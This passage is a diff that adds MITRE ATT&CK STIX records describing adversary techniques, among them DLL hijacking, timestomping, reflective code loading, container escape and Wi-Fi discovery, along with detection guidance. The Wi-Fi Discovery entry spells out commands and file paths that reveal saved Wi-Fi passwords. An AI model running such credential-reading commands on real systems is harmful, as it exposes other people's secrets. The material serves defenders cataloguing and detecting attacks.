"mitre-attack", + "phase_name": "privilege-escalation" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Stefan Kanthak", + "Travis Smith, Tripwire" + ], + "x_mitre_detection": "Monitor file systems for moving, renaming, replacing, or modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared with past behavior) that do not correlate with known software, patches, etc., are suspicious. Monitor DLLs loaded into a process and detect DLLs that have the same file name but abnormal paths. Modifications to or creation of .manifest and .local redirection files that do not correlate with software updates are suspicious.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "Process whitelisting" + ], + "x_mitre_effective_permissions": [ + "User", + "Administrator", + "SYSTEM" + ], + "x_mitre_permissions_required": [ + "User", + "Administrator", + "SYSTEM" + ], + "x_mitre_system_requirements": [ + "Ability to add a DLL, manifest file, or .local file, directory, or junction." + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--46944654-fcc1-4f63-9dad-628102376586", + "created": "2017-05-31T21:30:40.604Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1038", + "external_id": "T1038" + }, + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/471.html", + "external_id": "CAPEC-471" + }, + { + "source_name": "Microsoft DLL Search", + "description": "Microsoft. (n.d.). Dynamic-Link Library Search Order. Retrieved November 30, 2014.", + "url": "http://msdn.microsoft.com/en-US/library/ms682586" + }, + { + "source_name": "OWASP Binary Planting", + "description": "OWASP. (2013, January 30). Binary planting. Retrieved June 7, 2016.", + "url": "https://www.owasp.org/index.php/Binary_planting" + }, + { + "source_name": "Microsoft 2269637", + "description": "Microsoft. (2010, August 22). Microsoft Security Advisory 2269637 Released. Retrieved December 5, 2014.", + "url": "https://msrc-blog.microsoft.com/2010/08/21/microsoft-security-advisory-2269637-released/" + }, + { + "source_name": "Microsoft DLL Redirection", + "description": "Microsoft. (n.d.). Dynamic-Link Library Redirection. Retrieved December 5, 2014.", + "url": "http://msdn.microsoft.com/en-US/library/ms682600" + }, + { + "source_name": "Microsoft Manifests", + "description": "Microsoft. (n.d.). Manifests. Retrieved December 5, 2014.", + "url": "https://msdn.microsoft.com/en-US/library/aa375365" + }, + { + "source_name": "Mandiant Search Order", + "description": "Mandiant. (2010, August 31). DLL Search Order Hijacking Revisited. Retrieved December 5, 2014.", + "url": "https://www.mandiant.com/blog/dll-search-order-hijacking-revisited/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "New Service", + "description": "When operating systems boot up, they can start programs or applications called services that perform background system functions. (Citation: TechNet Services) A service's configuration information, including the file path to the service's executable, is stored in the Windows Registry. \n\nAdversaries may install a new service that can be configured to execute at startup by using utilities to interact with services or by directly modifying the Registry. The service name may be disguised by using a name from a related operating system or benign software with [Masquerading](https://attack.mitre.org/techniques/T1036). Services may be created with administrator privileges but are executed under SYSTEM privileges, so an adversary may also use a service to escalate privileges from administrator to SYSTEM. Adversaries may also directly start services through [Service Execution](https://attack.mitre.org/techniques/T1035).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Pedro Harrison" + ], + "x_mitre_detection": "Monitor service creation through changes in the Registry and common utilities using command-line invocation. Creation of new services may generate an alterable event (ex: Event ID 4697 and/or 7045 (Citation: Microsoft 4697 APR 2017) (Citation: Microsoft Windows Event Forwarding FEB 2018)). New, benign services may be created during installation of new software. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.\n\nTools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence. (Citation: TechNet Autoruns) Look for changes to services that do not correlate with known software, patch cycles, etc. Suspicious program execution through services may show up as outlier processes that have not been seen before when compared against historical data.\n\nMonitor processes and command-line arguments for actions that could create services. Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. Services may also be created through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1086), so additional logging may need to be configured to gather the appropriate data.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_effective_permissions": [ + "SYSTEM" + ], + "x_mitre_permissions_required": [ + "Administrator", + "SYSTEM" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--478aa214-2ca7-4ec0-9978-18798e514790", + "created": "2017-05-31T21:30:45.613Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1050", + "external_id": "T1050" + }, + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/550.html", + "external_id": "CAPEC-550" + }, + { + "source_name": "TechNet Services", + "description": "Microsoft. (n.d.). Services. Retrieved June 7, 2016.", + "url": "https://technet.microsoft.com/en-us/library/cc772408.aspx" + }, + { + "source_name": "Microsoft 4697 APR 2017", + "description": "Miroshnikov, A. & Hall, J. (2017, April 18). 4697(S): A service was installed in the system. Retrieved August 7, 2018.", + "url": "https://docs.microsoft.com/windows/security/threat-protection/auditing/event-4697" + }, + { + "source_name": "Microsoft Windows Event Forwarding FEB 2018", + "description": "Hardy, T. & Hall, J. (2018, February 15). Use Windows Event Forwarding to help with intrusion detection. Retrieved August 7, 2018.", + "url": "https://docs.microsoft.com/windows/security/threat-protection/use-windows-event-forwarding-to-assist-in-intrusion-detection" + }, + { + "source_name": "TechNet Autoruns", + "description": "Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. Retrieved June 6, 2016.", + "url": "https://technet.microsoft.com/en-us/sysinternals/bb963902" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2021-04-29T14:49:39.188Z", + "name": "Timestomp", + "description": "Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.\n\nTimestomping may be used along with file name [Masquerading](https://attack.mitre.org/techniques/T1036) to hide malware and tools.(Citation: WindowsIR Anti-Forensic Techniques)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Romain Dumont, ESET" + ], + "x_mitre_detection": "Forensic techniques exist to detect aspects of files that have had their timestamps modified. (Citation: WindowsIR Anti-Forensic Techniques) It may be possible to detect timestomping using file modification monitoring that collects information on file handle opens and can compare timestamp values.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "Host forensic analysis" + ], + "x_mitre_permissions_required": [ + "root", + "SYSTEM", + "User" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--47f2d673-ca62-47e9-929b-1b0be9657611", + "created": "2020-01-31T12:42:44.103Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1070/006", + "external_id": "T1070.006" + }, + { + "source_name": "WindowsIR Anti-Forensic Techniques", + "description": "Carvey, H. (2013, July 23). HowTo: Determine/Detect the use of Anti-Forensics Techniques. Retrieved June 3, 2016.", + "url": "http://windowsir.blogspot.com/2013/07/howto-determinedetect-use-of-anti.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-02-09T18:49:08.428Z", + "name": "Reflective Code Loading", + "description": "Adversaries may reflectively load code into a process in order to conceal the execution of malicious payloads. Reflective loading involves allocating then executing payloads directly within the memory of the process, vice creating a thread or process backed by a file path on disk (e.g., [Shared Modules](https://attack.mitre.org/techniques/T1129)).\n\nReflectively loaded payloads may be compiled binaries, anonymous files (only present in RAM), or just snubs of fileless executable code (ex: position-independent shellcode).(Citation: Introducing Donut)(Citation: S1 Custom Shellcode Tool)(Citation: Stuart ELF Memory)(Citation: 00sec Droppers)(Citation: Mandiant BYOL) For example, the `Assembly.Load()` method executed by [PowerShell](https://attack.mitre.org/techniques/T1059/001) may be abused to load raw code into the running process.(Citation: Microsoft AssemblyLoad)\n\nReflective code injection is very similar to [Process Injection](https://attack.mitre.org/techniques/T1055) except that the “injection” loads code into the processes’ own memory instead of that of a separate process. Reflective loading may evade process-based detections since the execution of the arbitrary code may be masked within a legitimate or otherwise benign process. Reflectively loading payloads directly into memory may also avoid creating files or other artifacts on disk, while also enabling malware to keep these payloads encrypted (or otherwise obfuscated) until execution.(Citation: Stuart ELF Memory)(Citation: 00sec Droppers)(Citation: Intezer ACBackdoor)(Citation: S1 Old Rat New Tricks)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "João Paulo de A. Filho, @Hug1nN__", + "Shlomi Salem, SentinelOne", + "Lior Ribak, SentinelOne", + "Rex Guo, @Xiaofei_REX, Confluera", + "Joas Antonio dos Santos, @C0d3Cr4zy, Inmetrics", + "Jiraput Thamsongkrah" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor for code artifacts associated with reflectively loading code, such as the abuse of .NET functions such as Assembly.Load() and [Native API](https://attack.mitre.org/techniques/T1106) functions such as CreateThread(), memfd_create(), execve(), and/or execveat().(Citation: 00sec Droppers)(Citation: S1 Old Rat New Tricks)\n\nMonitor for artifacts of abnormal process execution. For example, a common signature related to reflective code loading on Windows is mechanisms related to the .NET Common Language Runtime (CLR) -- such as mscor.dll, mscoree.dll, and clr.dll -- loading into abnormal processes (such as notepad.exe). Similarly, AMSI / ETW traces can be used to identify signs of arbitrary code execution from within the memory of potentially compromised processes.(Citation: MDSec Detecting DOTNET)(Citation: Introducing Donut)\n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. ", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "macOS", + "Linux", + "Windows" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "Application control", + "Anti-virus" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--4933e63b-9b77-476e-ab29-761bc5b7d15a", + "created": "2021-10-05T01:15:06.293Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1620", + "external_id": "T1620" + }, + { + "source_name": "00sec Droppers", + "description": "0x00pico. (2017, September 25). Super-Stealthy Droppers. Retrieved October 4, 2021.", + "url": "https://0x00sec.org/t/super-stealthy-droppers/3715" + }, + { + "source_name": "S1 Custom Shellcode Tool", + "description": "Bunce, D. (2019, October 31). Building A Custom Tool For Shellcode Analysis. Retrieved October 4, 2021.", + "url": "https://www.sentinelone.com/blog/building-a-custom-tool-for-shellcode-analysis/" + }, + { + "source_name": "Mandiant BYOL", + "description": "Kirk, N. (2018, June 18). Bring Your Own Land (BYOL) – A Novel Red Teaming Technique. Retrieved October 4, 2021.", + "url": "https://www.mandiant.com/resources/bring-your-own-land-novel-red-teaming-technique" + }, + { + "source_name": "S1 Old Rat New Tricks", + "description": "Landry, J. (2016, April 21). Teaching an old RAT new tricks. Retrieved October 4, 2021.", + "url": "https://www.sentinelone.com/blog/teaching-an-old-rat-new-tricks/" + }, + { + "source_name": "MDSec Detecting DOTNET", + "description": "MDSec Research. (n.d.). Detecting and Advancing In-Memory .NET Tradecraft. Retrieved October 4, 2021.", + "url": "https://www.mdsec.co.uk/2020/06/detecting-and-advancing-in-memory-net-tradecraft/" + }, + { + "source_name": "Microsoft AssemblyLoad", + "description": "Microsoft. (n.d.). Assembly.Load Method. Retrieved February 9, 2024.", + "url": "https://learn.microsoft.com/dotnet/api/system.reflection.assembly.load" + }, + { + "source_name": "Intezer ACBackdoor", + "description": "Sanmillan, I. (2019, November 18). ACBackdoor: Analysis of a New Multiplatform Backdoor. Retrieved October 4, 2021.", + "url": "https://www.intezer.com/blog/research/acbackdoor-analysis-of-a-new-multiplatform-backdoor/" + }, + { + "source_name": "Stuart ELF Memory", + "description": "Stuart. (2018, March 31). In-Memory-Only ELF Execution (Without tmpfs). Retrieved October 4, 2021.", + "url": "https://magisterquis.github.io/2018/03/31/in-memory-only-elf-execution.html" + }, + { + "source_name": "Introducing Donut", + "description": "The Wover. (2019, May 9). Donut - Injecting .NET Assemblies as Shellcode. Retrieved October 4, 2021.", + "url": "https://thewover.github.io/Introducing-Donut/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-10-13T17:57:04.784Z", + "name": "Data Destruction", + "description": "Adversaries may perform data destruction over the course of an operation. The adversary may drop or create malware, tools, or other non-native files on a target system to accomplish this, potentially leaving behind traces of malicious activities. Such non-native files and other data may be removed over the course of an intrusion to maintain a small footprint or as a standard part of the post-intrusion cleanup process. (Citation: Enterprise ATT&CK January 2018)\n\nData destruction may also be used to render operator interfaces unable to respond and to disrupt response functions from occurring as expected. An adversary may also destroy data backups that are vital to recovery after an incident.\n\nStandard file deletion commands are available on most operating system and device interfaces to perform cleanup, but adversaries may use other tools as well. Two examples are Windows Sysinternals SDelete and Active@ Killdisk.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "inhibit-response-function" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Matan Dobrushin - Otorio" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [ + "File: File Modification", + "Process: Process Creation", + "File: File Deletion", + "Command: Command Execution" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--493832d9-cea6-4b63-abe7-9a65a6473675", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0809", + "external_id": "T0809" + }, + { + "source_name": "Enterprise ATT&CK January 2018", + "description": "Enterprise ATT&CK 2018, January 11 File Deletion Retrieved. 2018/05/17 ", + "url": "https://attack.mitre.org/wiki/Technique/T1107" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-10-05T11:35:30.887Z", + "name": "Wi-Fi Discovery", + "description": "Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems. Adversaries may use Wi-Fi information as part of [Account Discovery](https://attack.mitre.org/techniques/T1087), [Remote System Discovery](https://attack.mitre.org/techniques/T1018), and other discovery or [Credential Access](https://attack.mitre.org/tactics/TA0006) activity to support both ongoing and future campaigns.\n\nAdversaries may collect various types of information about Wi-Fi networks from hosts. For example, on Windows names and passwords of all Wi-Fi networks a device has previously connected to may be available through `netsh wlan show profiles` to enumerate Wi-Fi names and then `netsh wlan show profile “Wi-Fi name” key=clear` to show a Wi-Fi network’s corresponding password.(Citation: BleepingComputer Agent Tesla steal wifi passwords)(Citation: Malware Bytes New AgentTesla variant steals WiFi credentials)(Citation: Check Point APT35 CharmPower January 2022) Additionally, names and other details of locally reachable Wi-Fi networks can be discovered using calls to `wlanAPI.dll` [Native API](https://attack.mitre.org/techniques/T1106) functions.(Citation: Binary Defense Emotes Wi-Fi Spreader)\n\nOn Linux, names and passwords of all Wi-Fi-networks a device has previously connected to may be available in files under ` /etc/NetworkManager/system-connections/`.(Citation: Wi-Fi Password of All Connected Networks in Windows/Linux) On macOS, the password of a known Wi-Fi may be identified with ` security find-generic-password -wa wifiname` (requires admin username/password).(Citation: Find Wi-Fi Password on Mac)\n", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "discovery" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Christopher Peacock", + "Uriel Kosayev", + "Liran Ravich, CardinalOps", + "Alex Spivakovsky, Pentera" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "This type of attack technique cannot be easily mitigated with preventive controls since it is based on the abuse of system features.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--494ab9f0-36e0-4b06-b10d-57285b040a06", + "created": "2023-09-08T15:39:50.269Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1016/002", + "external_id": "T1016.002" + }, + { + "source_name": "Binary Defense Emotes Wi-Fi Spreader", + "description": "Binary Defense. (n.d.). Emotet Evolves With new Wi-Fi Spreader. Retrieved September 8, 2023.", + "url": "https://www.binarydefense.com/resources/blog/emotet-evolves-with-new-wi-fi-spreader/" + }, + { + "source_name": "Check Point APT35 CharmPower January 2022", + "description": "Check Point. (2022, January 11). APT35 exploits Log4j vulnerability to distribute new modular PowerShell toolkit. Retrieved January 24, 2022.", + "url": "https://research.checkpoint.com/2022/apt35-exploits-log4j-vulnerability-to-distribute-new-modular-powershell-toolkit/" + }, + { + "source_name": "Wi-Fi Password of All Connected Networks in Windows/Linux", + "description": "Geeks for Geeks. (n.d.). Wi-Fi Password of All Connected Networks in Windows/Linux. Retrieved September 8, 2023.", + "url": "https://www.geeksforgeeks.org/wi-fi-password-connected-networks-windowslinux/" + }, + { + "source_name": "Malware Bytes New AgentTesla variant steals WiFi credentials", + "description": "Hossein Jazi. (2020, April 16). New AgentTesla variant steals WiFi credentials. Retrieved September 8, 2023.", + "url": "https://www.malwarebytes.com/blog/news/2020/04/new-agenttesla-variant-steals-wifi-credentials" + }, + { + "source_name": "Find Wi-Fi Password on Mac", + "description": "Ruslana Lishchuk. (2021, March 26). How to Find a Saved Wi-Fi Password on a Mac. Retrieved September 8, 2023.", + "url": "https://mackeeper.com/blog/find-wi-fi-password-on-mac/" + }, + { + "source_name": "BleepingComputer Agent Tesla steal wifi passwords", + "description": "Sergiu Gatlan. (2020, April 16). Hackers steal WiFi passwords using upgraded Agent Tesla malware. Retrieved September 8, 2023.", + "url": "https://www.bleepingcomputer.com/news/security/hackers-steal-wifi-passwords-using-upgraded-agent-tesla-malware/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-11-06T20:14:51.609Z", + "name": "Ignore Process Interrupts", + "description": "Adversaries may evade defensive mechanisms by executing commands that hide from process interrupt signals. Many operating systems use signals to deliver messages to control process behavior. Command interpreters often include specific commands/flags that ignore errors and other hangups, such as when the user of the active session logs off.(Citation: Linux Signal Man) These interrupt signals may also be used by defensive tools and/or analysts to pause or terminate specified running processes. \n\nAdversaries may invoke processes using `nohup`, [PowerShell](https://attack.mitre.org/techniques/T1059/001) `-ErrorAction SilentlyContinue`, or similar commands that may be immune to hangups.(Citation: nohup Linux Man)(Citation: Microsoft PowerShell SilentlyContinue) This may enable malicious commands and malware to continue execution through system events that would otherwise terminate its execution, such as users logging off or the termination of its C2 network connection.\n\nHiding from process interrupt signals may allow malware to continue execution, but unlike [Trap](https://attack.mitre.org/techniques/T1546/005) this does not establish [Persistence](https://attack.mitre.org/tactics/TA0003) since the process will not be re-invoked once actually terminated.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Viren Chaudhari, Qualys" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--4a2975db-414e-4c0c-bd92-775987514b4b", + "created": "2023-08-24T17:23:34.470Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1564/011", + "external_id": "T1564.011" + }, + { + "source_name": "Linux Signal Man", + "description": "Linux man-pages. (2023, April 3). signal(7). Retrieved August 30, 2023.", + "url": "https://man7.org/linux/man-pages/man7/signal.7.html" + }, + { + "source_name": "nohup Linux Man", + "description": "Meyering, J. (n.d.). nohup(1). Retrieved August 30, 2023.", + "url": "https://linux.die.net/man/1/nohup" + }, + { + "source_name": "Microsoft PowerShell SilentlyContinue", + "description": "Microsoft. (2023, March 2). $DebugPreference. Retrieved August 30, 2023.", + "url": "https://learn.microsoft.com/powershell/module/microsoft.powershell.core/about/about_preference_variables?view=powershell-7.3#debugpreference" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-04-19T12:42:18.632Z", + "name": "Escape to Host", + "description": "Adversaries may break out of a container to gain access to the underlying host. This can allow an adversary access to other containerized resources from the host level or to the host itself. In principle, containerized resources should provide a clear separation of application functionality and be isolated from the host environment.(Citation: Docker Overview)\n\nThere are multiple ways an adversary may escape to a host environment. Examples include creating a container configured to mount the host’s filesystem using the bind parameter, which allows the adversary to drop payloads and execute control utilities such as cron on the host; utilizing a privileged container to run commands or load a malicious kernel module on the underlying host; or abusing system calls such as `unshare` and `keyctl` to escalate privileges and steal secrets.(Citation: Docker Bind Mounts)(Citation: Trend Micro Privileged Container)(Citation: Intezer Doki July 20)(Citation: Container Escape)(Citation: Crowdstrike Kubernetes Container Escape)(Citation: Keyctl-unmask)\n\nAdditionally, an adversary may be able to exploit a compromised container with a mounted container management socket, such as `docker.sock`, to break out of the container via a [Container Administration Command](https://attack.mitre.org/techniques/T1609).(Citation: Container Escape) Adversaries may also escape via [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), such as exploiting vulnerabilities in global symbolic links in order to access the root directory of a host machine.(Citation: Windows Server Containers Are Open)\n\nGaining access to the host may provide the adversary with the opportunity to achieve follow-on objectives, such as establishing persistence, moving laterally within the environment, accessing other containers running on the host, or setting up a command and control channel on the host.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Yuval Avrahami, Palo Alto Networks", + "Daniel Prizmant, Palo Alto Networks", + "Alfredo Oliveira, Trend Micro", + "David Fiser, @anu4is, Trend Micro", + "Idan Frimark, Cisco", + "Magno Logan, @magnologan, Trend Micro", + "Ariel Shuper, Cisco", + "Yossi Weizman, Azure Defender Research Team", + "Vishwas Manral, McAfee", + "CrowdStrike", + "Eran Ayalon, Cybereason", + "Oren Ofer, Cybereason", + "Ilan Sokol, Cybereason", + "Joas Antonio dos Santos, @C0d3Cr4zy" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor for the deployment of suspicious or unknown container images and pods in your environment, particularly containers running as root. Additionally, monitor for unexpected usage of syscalls such as mount (as well as resulting process activity) that may indicate an attempt to escape from a privileged container to host. In Kubernetes, monitor for cluster-level events associated with changing containers' volume configurations.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Linux", + "Containers" + ], + "x_mitre_version": "1.5", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "Administrator", + "User", + "root" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--4a5b7ade-8bb5-4853-84ed-23f262002665", + "created": "2021-03-30T17:38:34.277Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1611", + "external_id": "T1611" + }, + { + "source_name": "Container Escape", + "description": "0xn3va. (n.d.). Escaping. Retrieved May 27, 2022.", + "url": "https://0xn3va.gitbook.io/cheat-sheets/container/escaping" + }, + { + "source_name": "Windows Server Containers Are Open", + "description": "Daniel Prizmant. (2020, July 15). Windows Server Containers Are Open, and Here's How You Can Break Out. Retrieved October 1, 2021.", + "url": "https://unit42.paloaltonetworks.com/windows-server-containers-vulnerabilities/" + }, + { + "source_name": "Docker Overview", + "description": "Docker. (n.d.). Docker Overview. Retrieved March 30, 2021.", + "url": "https://docs.docker.com/get-started/overview/" + }, + { + "source_name": "Docker Bind Mounts", + "description": "Docker. (n.d.). Use Bind Mounts. Retrieved March 30, 2021.", + "url": "https://docs.docker.com/storage/bind-mounts/" + }, + { + "source_name": "Trend Micro Privileged Container", + "description": "Fiser, D., Oliveira, A.. (2019, December 20). Why a Privileged Container in Docker is a Bad Idea. Retrieved March 30, 2021.", + "url": "https://www.trendmicro.com/en_us/research/19/l/why-running-a-privileged-container-in-docker-is-a-bad-idea.html" + }, + { + "source_name": "Intezer Doki July 20", + "description": "Fishbein, N., Kajiloti, M.. (2020, July 28). Watch Your Containers: Doki Infecting Docker Servers in the Cloud. Retrieved March 30, 2021.", + "url": "https://www.intezer.com/blog/cloud-security/watch-your-containers-doki-infecting-docker-servers-in-the-cloud/" + }, + { + "source_name": "Crowdstrike Kubernetes Container Escape", + "description": "Manoj Ahuje. (2022, January 31). CVE-2022-0185: Kubernetes Container Escape Using Linux Kernel Exploit. Retrieved July 6, 2022.", + "url": "https://www.crowdstrike.com/blog/cve-2022-0185-kubernetes-container-escape-using-linux-kernel-exploit/" + }, + { + "source_name": "Keyctl-unmask", + "description": "Mark Manning. (2020, July 23). Keyctl-unmask: \"Going Florida\" on The State Of Containerizing Linux Keyrings. Retrieved July 6, 2022.", + "url": "https://www.antitree.com/2020/07/keyctl-unmask-going-florida-on-the-state-of-containerizing-linux-keyrings/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-05-09T14:00:00.188Z", + "name": "Shortcut Modification", + "description": "Adversaries may create or modify shortcuts that can execute a program during system boot or user login. Shortcuts or symbolic links are used to reference other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process.\n\nAdversaries may abuse shortcuts in the startup folder to execute their tools and achieve persistence.(Citation: Shortcut for Persistence ) Although often used as payloads in an infection chain (e.g. [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001)), adversaries may also create a new shortcut as a means of indirection, while also abusing [Masquerading](https://attack.mitre.org/techniques/T1036) to make the malicious shortcut appear as a legitimate program. Adversaries can also edit the target path or entirely replace an existing shortcut so their malware will be executed instead of the intended legitimate program.\n\nShortcuts can also be abused to establish persistence by implementing other methods. For example, LNK browser extensions may be modified (e.g. [Browser Extensions](https://attack.mitre.org/techniques/T1176)) to persistently launch malware.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "David French, Elastic", + "Bobby, Filar, Elastic", + "Travis Smith, Tripwire" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Since a shortcut's target path likely will not change, modifications to shortcut files that do not correlate with known software changes, patches, removal, etc., may be suspicious. Analysis should 